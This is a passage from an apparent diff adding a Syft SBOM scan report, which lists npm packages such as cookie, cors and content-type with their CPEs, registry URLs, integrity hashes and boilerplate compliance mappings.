"ee26fc9f2aa2694f", + "name": "concat-stream", + "version": "1.6.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:concat-stream:concat-stream:1.6.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:concat-stream:concat_stream:1.6.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:concat_stream:concat-stream:1.6.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:concat_stream:concat_stream:1.6.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:concat:concat-stream:1.6.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:concat:concat_stream:1.6.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/concat-stream@1.6.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.2.tgz", + "integrity": "sha512-27HBghJxjiZtIk3Ycvn/4kbJk/1uZuJFfuPEns6LaEvpvG1f0hTea8lilrouyo9mVc2GWdcEZ8OLoGmSADlrCw==", + "dependencies": { + "buffer-from": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^2.2.2", + "typedarray": "^0.0.6" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6a853859517f2ba3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: config-chain 1.1.13", + "title": "config-chain 1.1.13", + "description": "Package discovered: config-chain 1.1.13", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f8adcbfce494f378", + "name": "config-chain", + "version": "1.1.13", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:config-chain:config-chain:1.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:config-chain:config_chain:1.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:config_chain:config-chain:1.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:config_chain:config_chain:1.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:config:config-chain:1.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:config:config_chain:1.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/config-chain@1.1.13", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/config-chain/-/config-chain-1.1.13.tgz", + "integrity": "sha512-qj+f8APARXHrM0hraqXYb2/bOVSV4PvJQlNZ/DVj0QrmNM2q2euizkeuVckQ57J+W0mRH6Hvi+k50M4Jul2VRQ==", + "dependencies": { + "ini": "^1.3.4", + "proto-list": "~1.2.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "aa020ae4ab2eadc3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: content-disposition 0.5.4", + "title": "content-disposition 0.5.4", + "description": "Package discovered: content-disposition 0.5.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5a8a76bf321e2afc", + "name": "content-disposition", + "version": "0.5.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:content-disposition:content-disposition:0.5.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:content-disposition:content_disposition:0.5.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:content_disposition:content-disposition:0.5.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:content_disposition:content_disposition:0.5.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:content:content-disposition:0.5.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:content:content_disposition:0.5.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/content-disposition@0.5.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz", + "integrity": "sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ==", + "dependencies": { + "safe-buffer": "5.2.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9a45820ffdb99ef9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: content-type 1.0.5", + "title": "content-type 1.0.5", + "description": "Package discovered: content-type 1.0.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e6774efb67a1cd80", + "name": "content-type", + "version": "1.0.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:content-type:content-type:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:content-type:content_type:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:content_type:content-type:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:content_type:content_type:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:content:content-type:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:content:content_type:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/content-type@1.0.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/content-type/-/content-type-1.0.5.tgz", + "integrity": "sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "475f89190adc46cd", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: cookie 0.7.2", + "title": "cookie 0.7.2", + "description": "Package discovered: cookie 0.7.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "dabea341270367ac", + "name": "cookie", + "version": "0.7.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:cookie:cookie:0.7.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/cookie@0.7.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.7.2.tgz", + "integrity": "sha512-yki5XnKuf750l50uGTllt6kKILY4nQ1eNIQatoXEByZ5dWgnKqbnqmTrBE5B4N7lrMJKQ2ytWMiTO2o0v6Ew/w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "980ccdca1420305a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: cookie-signature 1.0.7", + "title": "cookie-signature 1.0.7", + "description": "Package discovered: cookie-signature 1.0.7", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c3cdc836e23cbee4", + "name": "cookie-signature", + "version": "1.0.7", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:cookie-signature_project:cookie-signature:1.0.7:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/cookie-signature@1.0.7", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.7.tgz", + "integrity": "sha512-NXdYc3dLr47pBkpUCHtKSwIOQXLVn8dZEuywboCOJY/osA0wFSLlSawr3KN8qXJEyX66FcONTH8EIlVuK0yyFA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8ea7108a43fc0ad4", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: core-util-is 1.0.3", + "title": "core-util-is 1.0.3", + "description": "Package discovered: core-util-is 1.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9bfb1fb9a1cd315e", + "name": "core-util-is", + "version": "1.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:core-util-is:core-util-is:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:core-util-is:core_util_is:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:core_util_is:core-util-is:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:core_util_is:core_util_is:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:core-util:core-util-is:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:core-util:core_util_is:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:core_util:core-util-is:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:core_util:core_util_is:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:core:core-util-is:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:core:core_util_is:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/core-util-is@1.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", + "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "171e24f79e6f61b0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: cors 2.8.6", + "title": "cors 2.8.6", + "description": "Package discovered: cors 2.8.6", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c8f0caa18c740c23", + "name": "cors", + "version": "2.8.6", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:cors:cors:2.8.6:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/cors@2.8.6", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/cors/-/cors-2.8.6.tgz", + "integrity": "sha512-tJtZBBHA6vjIAaF6EnIaq6laBBP9aq/Y3ouVJjEfoHbRBcHBAHYcMh/w8LDrk2PvIMMq8gmopa5D4V8RmbrxGw==", + "dependencies": { + "object-assign": "^4", + "vary": "^1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "24841e3ab0fadbb6", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", + "startLine": 0 + }, + "message": "Package discovered: coverallsapp/github-action master", + "title": "coverallsapp/github-action master", + "description": "Package discovered: coverallsapp/github-action master", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "cbf693155383c51f", + "name": "coverallsapp/github-action", + "version": "master", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", + "accessPath": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:coverallsapp\\/github-action:coverallsapp\\/github-action:master:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:coverallsapp\\/github-action:coverallsapp\\/github_action:master:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:coverallsapp\\/github_action:coverallsapp\\/github-action:master:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:coverallsapp\\/github_action:coverallsapp\\/github_action:master:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": 